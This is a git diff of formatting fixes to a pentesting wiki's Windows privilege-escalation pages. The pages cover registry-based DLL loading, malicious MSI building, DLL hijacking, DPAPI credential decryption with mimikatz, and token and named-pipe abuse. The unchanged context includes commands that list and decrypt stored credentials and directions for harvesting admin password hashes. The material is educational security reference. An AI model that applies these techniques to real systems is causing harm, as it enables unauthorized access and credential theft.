 Before going any further, I always make sure that my payload is working properly by testing it separately. The little time spent here can save a lot of time afterwards by preventing you from going down a rabbit hole during a hypothetical debug phase. To do so, we can simply use `rundll32.exe` and pass the name of the DLL and the name of an exported function as the parameters.
 
@@ -240,7 +240,7 @@ C:\Users\lab-user\Downloads\>rundll32 DllRpcEndpointMapperPoc.dll,OpenPerfData
 
 ![](https://itm4n.github.io/assets/posts/2020-11-12-windows-registry-rpceptmapper-eop/09\_test-poc-rundll32.gif)
 
-Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by `rundll32.exe`. The second one was written when `OpenPerfData` was called. Looks good! ![:slightly_smiling_face:](https://github.githubassets.com/images/icons/emoji/unicode/1f642.png)
+Great, the log file was created and, if we open it, we can see two entries. The first one was written when the DLL was loaded by `rundll32.exe`. The second one was written when `OpenPerfData` was called. Looks good! ![:slightly\_smiling\_face:](https://github.githubassets.com/images/icons/emoji/unicode/1f642.png)
 
 ```
 [21:25:34] - PID=3040 - PPID=2964 - USER='lab-user' - CMD='rundll32  DllRpcEndpointMapperPoc.dll,OpenPerfData' - METHOD='DllMain'
@@ -251,7 +251,7 @@ Ok, now we can focus on the actual vulnerability and start by creating the requi
 
 ![](https://itm4n.github.io/assets/posts/2020-11-12-windows-registry-rpceptmapper-eop/10\_powershell-new-item-access-denied.png)
 
-`Requested registry access is not allowed`… Hmmm, ok… It looks like it won’t be that easy after all. ![:stuck_out_tongue:](https://github.githubassets.com/images/icons/emoji/unicode/1f61b.png)
+`Requested registry access is not allowed`… Hmmm, ok… It looks like it won’t be that easy after all. ![:stuck\_out\_tongue:](https://github.githubassets.com/images/icons/emoji/unicode/1f61b.png)
 
 I didn’t really investigate this issue but my guess is that when we call `New-Item`, `powershell.exe` actually tries to open the parent registry key with some flags that correspond to permissions we don’t have.
 
@@ -291,7 +291,7 @@ Remove-ItemProperty -Path "HKLM:$($ServiceKey)" -Name "Close" -Force
 
 The last step now, **how do we trick the RPC Endpoint Mapper service into loading our Performace DLL?** Unfortunately, I haven’t kept track of all the different things I tried. It would have been really interesting in the context of this blog post to highlight how tedious and time consuming research can sometimes be. Anyway, one thing I found along the way is that you can query _Perfomance Counters_ using WMI (_Windows Management Instrumentation_), which isn’t too surprising after all. More info here: [_WMI Performance Counter Types_](https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-performance-counter-types).
 
-> _Counter types appear as the CounterType qualifier for properties in _[_Win32\_PerfRawData_](https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-perfrawdata)_ classes, and as the CookingType qualifier for properties in _[_Win32\_PerfFormattedData_](https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-perfformatteddata)_ classes._
+> _Counter types appear as the CounterType qualifier for properties in_ [_Win32\_PerfRawData_](https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-perfrawdata) _classes, and as the CookingType qualifier for properties in_ [_Win32\_PerfFormattedData_](https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-perfformatteddata) _classes._
 
 So, I first enumerated the WMI classes that are related to _Performace Data_ in PowerShell using the following command.
 
@@ -331,7 +331,7 @@ Get-WmiObject Win32_PerfRawData
 Get-WmiObject Win32_PerfFormattedData
 ```
 
-### Conclusion <a href="conclusion" id="conclusion"></a>
+### Conclusion <a href="#conclusion" id="conclusion"></a>
 
 I don’t know how this vulnerability has gone unnoticed for so long. One explanation is that other tools probably looked for full write access in the registry, whereas `AppendData/AddSubdirectory` was actually enough in this case. Regarding the “misconfiguration” itself, I would assume that the registry key was set this way for a specific purpose, although I can’t think of a concrete scenario in which users would have any kind of permissions to modify a service’s configuration.
 
diff --git a/windows/windows-local-privilege-escalation/create-msi-with-wix.md b/windows/windows-local-privilege-escalation/create-msi-with-wix.md
index da744096..e39278b8 100644
--- a/windows/windows-local-privilege-escalation/create-msi-with-wix.md
+++ b/windows/windows-local-privilege-escalation/create-msi-with-wix.md
@@ -1,6 +1,6 @@
 # Create MSI with WIX
 
-**Tutorial copied from **[**https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root**](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)\
+**Tutorial copied from** [**https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root**](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)\
 In order to create the msi we will use [wixtools](http://wixtoolset.org) , you can use other msi builders but they didn’t work for me.\
 Check [this page](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with) for some wix msi usage examples.\
 We will create an msi that executes our lnk file :
@@ -37,7 +37,7 @@ fail_here
 </Wix>
 ```
 
- We will use `candle.exe` from wixtools to create a wixobject from `msi.xml`
+&#x20;We will use `candle.exe` from wixtools to create a wixobject from `msi.xml`
 
 ```markup
 candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
diff --git a/windows/windows-local-privilege-escalation/dll-hijacking.md b/windows/windows-local-privilege-escalation/dll-hijacking.md
index 746631ce..e402e9dc 100644
--- a/windows/windows-local-privilege-escalation/dll-hijacking.md
+++ b/windows/windows-local-privilege-escalation/dll-hijacking.md
@@ -2,9 +2,9 @@
 
 ## Definition
 
-First of all, let’s get the definition out of the way. DLL hijacking is, in the broadest sense,** tricking a legitimate/trusted application into loading an arbitrary DLL**. Terms such as _DLL Search Order Hijacking_, _DLL Load Order Hijacking_, _DLL Spoofing_, _DLL Injection_ and _DLL Side-Loading_ are often -mistakenly- used to say the same.
+First of all, let’s get the definition out of the way. DLL hijacking is, in the broadest sense, **tricking a legitimate/trusted application into loading an arbitrary DLL**. Terms such as _DLL Search Order Hijacking_, _DLL Load Order Hijacking_, _DLL Spoofing_, _DLL Injection_ and _DLL Side-Loading_ are often -mistakenly- used to say the same.
 
-Dll hijacking can be used to **execute **code, obtain **persistence **and **escalate privileges**. From those 3 the **least probable **to find is **privilege escalation **by far. However, as this is part of the privilege escalation section, I will focus on this option. Also, note that independently of the goal, a dll hijacking is perform the in the same way.
+Dll hijacking can be used to **execute** code, obtain **persistence** and **escalate privileges**. From those 3 the **least probable** to find is **privilege escalation** by far. However, as this is part of the privilege escalation section, I will focus on this option. Also, note that independently of the goal, a dll hijacking is perform the in the same way.
 
 ### Types
 
@@ -19,7 +19,7 @@ There is a **variety of approaches** to choose from, with success depending on h
 
 ## Finding missing Dlls
 
-The most common way to find missing Dlls inside a system is running [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) from sysinternals, **setting **the **following 2 filters**:
+The most common way to find missing Dlls inside a system is running [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) from sysinternals, **setting** the **following 2 filters**:
 
 ![](<../../.gitbook/assets/image (311).png>)
 
@@ -29,32 +29,32 @@ and just show the **File System Activity**:
 
 ![](<../../.gitbook/assets/image (314).png>)
 
-If you are looking for **missing dlls in general** you **leave **this running for some **seconds**.\
+If you are looking for **missing dlls in general** you **leave** this running for some **seconds**.\
 If you are looking for a **missing dll inside an specific executable** you should set **another filter like "Process Name" "contains" "\<exec name>", execute it, and stop capturing events**.
 
 ## Exploiting Missing Dlls
 
-In order to escalate privileges, the best chance we have is to be able to **write a dll that a privilege process will try to load** in some of **place where it is going to be searched**. Therefore, we will be able to **write** a dll in a **folder **where the **dll is searched before** the folder where the **original dll** is (weird case), or we will be able to **write on some folder where the dll is going to be searched** and the original **dll doesn't exist** on any folder.
+In order to escalate privileges, the best chance we have is to be able to **write a dll that a privilege process will try to load** in some of **place where it is going to be searched**. Therefore, we will be able to **write** a dll in a **folder** where the **dll is searched before** the folder where the **original dll** is (weird case), or we will be able to **write on some folder where the dll is going to be searched** and the original **dll doesn't exist** on any folder.
 
 ### Dll Search Order
 
-**Inside the **[**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching)** you can find how the Dlls are loaded specifically.**
+**Inside the** [**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **you can find how the Dlls are loaded specifically.**
 
-In general, a **Windows application** will use** pre-defined search paths to find DLL's** and it will check these paths in a specific order. DLL hijacking usually happens by placing a malicious DLL in one of these folders while making sure that DLL is found before the legitimate one. This problem can be mitigated by having the application specify absolute paths to the DLL's that it needs.
+In general, a **Windows application** will use **pre-defined search paths to find DLL's** and it will check these paths in a specific order. DLL hijacking usually happens by placing a malicious DLL in one of these folders while making sure that DLL is found before the legitimate one. This problem can be mitigated by having the application specify absolute paths to the DLL's that it needs.
 
 You can see the **DLL search order on 32-bit** systems below:
 
 1. The directory from which the application loaded.
 2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.(_C:\Windows\System32_)
 3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (_C:\Windows\System_)
-4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory. 
+4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.&#x20;
    1. (_C:\Windows_)
 5. The current directory.
 6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
 
-That is the **default** search order with **SafeDllSearchMode** enabled. When it's disabled the current directory escalates to second place. To disable this feature, create the **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** registry value and set it to 0 (default is enabled).
+That is the **default** search order with **SafeDllSearchMode** enabled. When it's disabled the current directory escalates to second place. To disable this feature, create the **HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** registry value and set it to 0 (default is enabled).
 
-If [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) function is called with **LOAD_WITH_ALTERED_SEARCH_PATH **the search begins in the directory of the executable module that **LoadLibraryEx** is loading.
+If [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) function is called with **LOAD\_WITH\_ALTERED\_SEARCH\_PATH** the search begins in the directory of the executable module that **LoadLibraryEx** is loading.
 
 Finally, note that **a dll could be loaded indicating the absolute path instead just the name**. In that case that dll is **only going to be searched in that path** (if the dll has any dependencies, they are going to be searched as just loaded by name).
 
@@ -63,18 +63,18 @@ There are other ways to alter the ways to alter the search order but I'm not goi
 #### Exceptions on dll search order from Windows docs
 
 * If a **DLL with the same module name is already loaded in memory**, the system checks only for redirection and a manifest before resolving to the loaded DLL, no matter which directory it is in. **The system does not search for the DLL**.
-* If the DLL is on the list of** known DLLs** for the version of Windows on which the application is running, the** system uses its copy of the known DLL** (and the known DLL's dependent DLLs, if any) **instead of searching** for the DLL. For a list of known DLLs on the current system, see the following registry key: **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**.
-* If a **DLL has dependencies**, the system **searches **for the dependent DLLs as if they were loaded with just their **module names**. This is true **even if the first DLL was loaded by specifying a full path**.
+* If the DLL is on the list of **known DLLs** for the version of Windows on which the application is running, the **system uses its copy of the known DLL** (and the known DLL's dependent DLLs, if any) **instead of searching** for the DLL. For a list of known DLLs on the current system, see the following registry key: **HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**.
+* If a **DLL has dependencies**, the system **searches** for the dependent DLLs as if they were loaded with just their **module names**. This is true **even if the first DLL was loaded by specifying a full path**.
 
 ### Escalating Privileges
 
 **Requisites**:
 
 * **Find a process** that runs/will run as with **other privileges** (horizontal/lateral movement) that is **missing a dll.**
-* Have **write permission** on any **folder **where the **dll **is going to be **searched **(probably the executable directory or some folder inside the system path).
+* Have **write permission** on any **folder** where the **dll** is going to be **searched** (probably the executable directory or some folder inside the system path).
 
-Yeah, the requisites are complicated to find as** by default it's kind of weird to find a privileged executable missing a dll** and it's even **more weird to have write permissions on a system path folder** (you can't by default). But, in misconfigured environments this is possible.\
-In the case you are lucky and you find yourself meeting the requirements, you could check the [UACME](https://github.com/hfiref0x/UACME) project. Even if the **main goal of the project is bypass UAC**, you may find there a **PoC **of a Dll hijaking for the Windows version that you can use (probably just changing the path of the folder where you have write permissions).
+Yeah, the requisites are complicated to find as **by default it's kind of weird to find a privileged executable missing a dll** and it's even **more weird to have write permissions on a system path folder** (you can't by default). But, in misconfigured environments this is possible.\
+In the case you are lucky and you find yourself meeting the requirements, you could check the [UACME](https://github.com/hfiref0x/UACME) project. Even if the **main goal of the project is bypass UAC**, you may find there a **PoC** of a Dll hijaking for the Windows version that you can use (probably just changing the path of the folder where you have write permissions).
 
 Note that you can **check your permissions in a folder** doing:
 
@@ -104,7 +104,7 @@ Other interesting automated tools to discover this vulnerability are **PowerSplo
 ### Example
 
 In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
-****Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates **or to create a **dll with non required functions exported**.
+****Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**.
 
 ## **Creating and compiling Dlls**
 
diff --git a/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index 6d213980..9e7dd2b8 100644
--- a/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/windows/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -7,7 +7,7 @@ While creating this post mimikatz was having problems with every action that int
 Its primary use in the Windows operating system is to **perform symmetric encryption of asymmetric private keys**, using a user or system secret as a significant contribution of entropy.\
 **DPAPI allows developers to encrypt keys using a symmetric key derived from the user's logon secrets**, or in the case of system encryption, using the system's domain authentication secrets.
 
-This makes very easy to developer to **save encrypted data** in the computer **without **needing to **worry **how to **protect **the **encryption** **key**.
+This makes very easy to developer to **save encrypted data** in the computer **without** needing to **worry** how to **protect** the **encryption** **key**.
 
 ## What does DPAPI protect?
 
@@ -47,7 +47,7 @@ This is what a bunch of Master Keys of a user will looks like:
 
 ![](<../../.gitbook/assets/image (324).png>)
 
-Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting **the **encrypted Master Key **is interesting in order to **decrypt **later that **other content **encrypted with it.&#x20;
+Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it.&#x20;
 
 ### Extract a master key
 
@@ -108,7 +108,7 @@ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
 ```
 
-You can use **mimikatz module** `dpapi::cred` with the appropiate` /masterkey` to decrypt:
+You can use **mimikatz module** `dpapi::cred` with the appropiate `/masterkey` to decrypt:
 
 ```
 dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>
diff --git a/windows/windows-local-privilege-escalation/integrity-levels.md b/windows/windows-local-privilege-escalation/integrity-levels.md
index 0ad5ea23..5c552116 100644
--- a/windows/windows-local-privilege-escalation/integrity-levels.md
+++ b/windows/windows-local-privilege-escalation/integrity-levels.md
@@ -2,22 +2,22 @@
 
 ## Integrity Levels
 
-From Windows Vista, all **protected objects are labeled with an integrity level**. Most user and system files and registry keys on the system have a default label of “medium” integrity. The primary exception is a set of specific folders and files writeable by Internet Explorer 7 at Low integrity. **Most processes** run by **standard users** are labeled with **medium integrity **(even the ones started by a user inside the administrators group), and most **services **are labeled with **System integrity**. The root directory is protected by a high-integrity label.\
-Note that** a process with a lower integrity level can’t write to an object with a higher integrity level.**\
+From Windows Vista, all **protected objects are labeled with an integrity level**. Most user and system files and registry keys on the system have a default label of “medium” integrity. The primary exception is a set of specific folders and files writeable by Internet Explorer 7 at Low integrity. **Most processes** run by **standard users** are labeled with **medium integrity** (even the ones started by a user inside the administrators group), and most **services** are labeled with **System integrity**. The root directory is protected by a high-integrity label.\
+Note that **a process with a lower integrity level can’t write to an object with a higher integrity level.**\
 There are several levels of integrity:
 
 * **Untrusted** – processes that are logged on anonymously are automatically designated as Untrusted. _Example: Chrome_
-* **Low** – The Low integrity level is the level used by default for interaction with the Internet. As long as Internet Explorer is run in its default state, Protected Mode, all files and processes associated with it are assigned the Low integrity level. Some folders, such as the **Temporary Internet Folder**, are also assigned the **Low integrity **level by default. However,  note that a** low integrity process** is very **restricted**, it **cannot **write to the **registry **and it’s limited from writing to **most locations **in the current user’s profile.  _Example: Internet Explorer or Microsoft Edge_
+* **Low** – The Low integrity level is the level used by default for interaction with the Internet. As long as Internet Explorer is run in its default state, Protected Mode, all files and processes associated with it are assigned the Low integrity level. Some folders, such as the **Temporary Internet Folder**, are also assigned the **Low integrity** level by default. However,  note that a **low integrity process** is very **restricted**, it **cannot** write to the **registry** and it’s limited from writing to **most locations** in the current user’s profile.  _Example: Internet Explorer or Microsoft Edge_
 * **Medium** – Medium is the context that **most objects will run in**. Standard users receive the Medium integrity level, and any object not explicitly designated with a lower or higher integrity level is Medium by default. Not that a user inside the Administrators group by default will use medium integrity levels.
-* **High** – **Administrators **are granted the High integrity level. This ensures that Administrators are capable of interacting with and modifying objects assigned Medium or Low integrity levels, but can also act on other objects with a High integrity level, which standard users can not do. _Example: "Run as Administrator"_
+* **High** – **Administrators** are granted the High integrity level. This ensures that Administrators are capable of interacting with and modifying objects assigned Medium or Low integrity levels, but can also act on other objects with a High integrity level, which standard users can not do. _Example: "Run as Administrator"_
 * **System** – As the name implies, the System integrity level is reserved for the system. The Windows kernel and core services are granted the System integrity level. Being even higher than the High integrity level of Administrators protects these core functions from being affected or compromised even by Administrators. Example: Services
 * **Installer** – The Installer integrity level is a special case and is the highest of all integrity levels. By virtue of being equal to or higher than all other WIC integrity levels, objects assigned the Installer integrity level are also able to uninstall all other objects.
 
-You can get the integrity level of a process using **Process Explorer** from **Sysinternals**, accessing the **properties **of the process and viewing the "**Security**" tab:
+You can get the integrity level of a process using **Process Explorer** from **Sysinternals**, accessing the **properties** of the process and viewing the "**Security**" tab:
 
 ![](<../../.gitbook/assets/image (318).png>)
 
-You can also get your **current integrity level **using `whoami /groups`
+You can also get your **current integrity level** using `whoami /groups`
 
 ![](<../../.gitbook/assets/image (319).png>)
 
@@ -37,7 +37,7 @@ asd.txt BUILTIN\Administrators:(I)(F)
         NT AUTHORITY\BATCH:(I)(M,DC)
 ```
 
-Now, lets assign a minimum integrity level of **High **to the file. This **must be done from a console** running as **administrator **as a **regular console **will be running in Medium Integrity level and **won't be allowed** to assign High Integrity level to an object:
+Now, lets assign a minimum integrity level of **High** to the file. This **must be done from a console** running as **administrator** as a **regular console** will be running in Medium Integrity level and **won't be allowed** to assign High Integrity level to an object:
 
 ```
 icacls asd.txt /setintegritylevel(oi)(ci) High
@@ -71,7 +71,7 @@ Access is denied.
 
 ### Integrity Levels in Binaries
 
-I made a copy of `cmd.exe` in `C:\Windows\System32\cmd-low.exe` and set it an** integrity level of low from an administrator console:**
+I made a copy of `cmd.exe` in `C:\Windows\System32\cmd-low.exe` and set it an **integrity level of low from an administrator console:**
 
 ```
 icacls C:\Windows\System32\cmd-low.exe
@@ -83,7 +83,7 @@ C:\Windows\System32\cmd-low.exe NT AUTHORITY\SYSTEM:(I)(F)
                                 Mandatory Label\Low Mandatory Level:(NW)
 ```
 
-Now, when I run `cmd-low.exe` it will** run under a low-integrity level** instead of a medium one:
+Now, when I run `cmd-low.exe` it will **run under a low-integrity level** instead of a medium one:
 
 ![](<../../.gitbook/assets/image (320).png>)
 
@@ -93,4 +93,4 @@ For curious people, if you assign high integrity level to a binary (`icacls C:\W
 
 Not all files and folders have a minimum integrity level, **but all processes are running under an integrity level**. And similar to what happened with the file-system, **if a process wants to write inside another process it must have at least the same integrity level**. This means that a process with low integrity level can’t open a handle with full access to a process with medium integrity level.
 
-Due to the restrictions commented in this and the previous section, from a security point of view, it's always** recommended to run a process in the lower level of integrity possible**.
+Due to the restrictions commented in this and the previous section, from a security point of view, it's always **recommended to run a process in the lower level of integrity possible**.
diff --git a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md
index 93a8fdf7..d4cfc876 100644
--- a/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/windows/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -7,7 +7,7 @@ Then, if you have **full access to the low privileged process**, you can grab th
 
 ## Vulnerable Example
 
-For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The** vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
+For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
 
 Therefore, this low privileges process is able to grab the handle of the high privileged process crated first and inject and execute a shellcode (see next section).
 
@@ -220,10 +220,10 @@ int _tmain( int argc, TCHAR* argv[] )
 ## Exploit Example 1
 
 {% hint style="info" %}
-In a real scenario you probably** won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will** compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
+In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
 {% endhint %}
 
-In this example you can find the code of a possible exploit for_ C:\users\username\desktop\client.exe_.\
+In this example you can find the code of a possible exploit for _C:\users\username\desktop\client.exe_.\
 The most interesting part of this code is located in `GetVulnProcHandle`. This function will **start fetching all the handles**, then it will **check if any of them belongs to the same PID** and if the handle belongs to a **process**. If all these requirements are completed (an accessible open process handle is found) , it try to **inject and execute a shellcode abusing the handle of the process**. \
 The injection of the shellcode is done inside the **`Inject`** function and it will just **write the shellcode inside the privileged process and create a thread inside the same process** to execute the shellcode).
 
@@ -433,7 +433,7 @@ int main(int argc, char **argv) {
 ## Exploit Example 2
 
 {% hint style="info" %}
-In a real scenario you probably** won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will** compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
+In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
 {% endhint %}
 
 In this example, **instead of abusing the open handle to inject** and execute a shellcode, it's going to be **used the token of the privileged open handle process to create a new one**. This is done in lines from 138 to 148.
diff --git a/windows/windows-local-privilege-escalation/msi-wrapper.md b/windows/windows-local-privilege-escalation/msi-wrapper.md
index c508b799..ecc22230 100644
--- a/windows/windows-local-privilege-escalation/msi-wrapper.md
+++ b/windows/windows-local-privilege-escalation/msi-wrapper.md
@@ -1,7 +1,7 @@
 # MSI Wrapper
 
 Download the free version app from [https://www.exemsi.com/documentation/getting-started/](https://www.exemsi.com/download/), execute it and wrap the "malicious" binary on it.\
-Note that you can wrap a "**.bat**" if you **just **want to **execute** **command lines (instead of cmd.exe select the .bat file)**
+Note that you can wrap a "**.bat**" if you **just** want to **execute** **command lines (instead of cmd.exe select the .bat file)**
 
 ![](<../../.gitbook/assets/image (304).png>)
 
@@ -15,4 +15,4 @@ And this is the most important part of the configuration:
 
 (Please, note that if you try to pack your own binary you will be able to modify these values)
 
-From here just click on** next buttons** and the last **build button and your installer/wrapper will be generated.**
+From here just click on **next buttons** and the last **build button and your installer/wrapper will be generated.**
diff --git a/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md
index b77ed7fe..d5a3b444 100644
--- a/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md
+++ b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md
@@ -1,6 +1,6 @@
 # Named Pipe Client Impersonation
 
-**This information was copied from **[**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)****
+**This information was copied from** [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)****
 
 ## Overview
 
@@ -114,12 +114,12 @@ We can even see our pipe with powershell:
 ## Token Impersonation
 
 {% hint style="info" %}
-Note that in order to impersonate the token of the client process you need to have (the server process creating the pipe) the**` SeImpersonate`** token privilege
+Note that in order to impersonate the token of the client process you need to have (the server process creating the pipe) the **`SeImpersonate`** token privilege
 {% endhint %}
 
 It is possible for the named pipe server to impersonate the named pipe client's security context by leveraging a `ImpersonateNamedPipeClient` API call which in turn changes the named pipe server's current thread's token with that of the named pipe client's token.
 
-We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below: 
+We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below:&#x20;
 
 ```cpp
 int main() {
diff --git a/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md b/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
index d3e6362f..80f47b30 100644
--- a/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
+++ b/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md
@@ -2,7 +2,7 @@
 
 ## Tokens
 
-If you** don't know what are Windows Access Tokens** read this page before continuing:
+If you **don't know what are Windows Access Tokens** read this page before continuing:
 
 {% content-ref url="access-tokens.md" %}
 [access-tokens.md](access-tokens.md)
@@ -18,18 +18,18 @@ Any process holding this privilege can **impersonate** (but not create) any **to
 
 It is very similar to **SeImpersonatePrivilege**, it will use the **same method** to get a privileged token.\
 Then, this privilege allows **to assign a primary token** to a new/suspended process. With the privileged impersonation token you can derivate a primary token (DuplicateTokenEx).\
-With the token, you can create a **new process **with 'CreateProcessAsUser' or create a process suspended and **set the token** (in general, you cannot modify the primary token of a running process).
+With the token, you can create a **new process** with 'CreateProcessAsUser' or create a process suspended and **set the token** (in general, you cannot modify the primary token of a running process).
 
 ### SeTcbPrivilege (3.1.3)
 
-If you have enabled this token you can use **KERB_S4U_LOGON** to get an **impersonation token** for any other user without knowing the credentials, **add an arbitrary group** (admins) to the token, set the **integrity level** of the token to "**medium**", and assign this token to the **current thread** (SetThreadToken).
+If you have enabled this token you can use **KERB\_S4U\_LOGON** to get an **impersonation token** for any other user without knowing the credentials, **add an arbitrary group** (admins) to the token, set the **integrity level** of the token to "**medium**", and assign this token to the **current thread** (SetThreadToken).
 
 ### SeBackupPrivilege (3.1.4)
 
 This privilege causes the system to **grant all read access** control to any file (only read).\
 Use it to **read the password hashes of local Administrator** accounts from the registry and then use "**psexec**" or "**wmicexec**" with the hash (PTH).\
- This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.\
-You can **abuse this privilege** with: [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) or with [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) or following IppSec in [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab_channel=IppSec)
+&#x20;This attack won't work if the Local Administrator is disabled, or if it is configured that a Local Admin isn't admin if he is connected remotely.\
+You can **abuse this privilege** with: [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1) or with [https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug](https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug) or following IppSec in [https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec](https://www.youtube.com/watch?v=IfCysW0Od8w\&t=2610\&ab\_channel=IppSec)
 
 ### SeRestorePrivilege (3.1.5)
 
@@ -39,21 +39,21 @@ You can **modify services**, DLL Hijacking, set **debugger** (Image File Executi
 ### SeCreateTokenPrivilege (3.1.6)
 
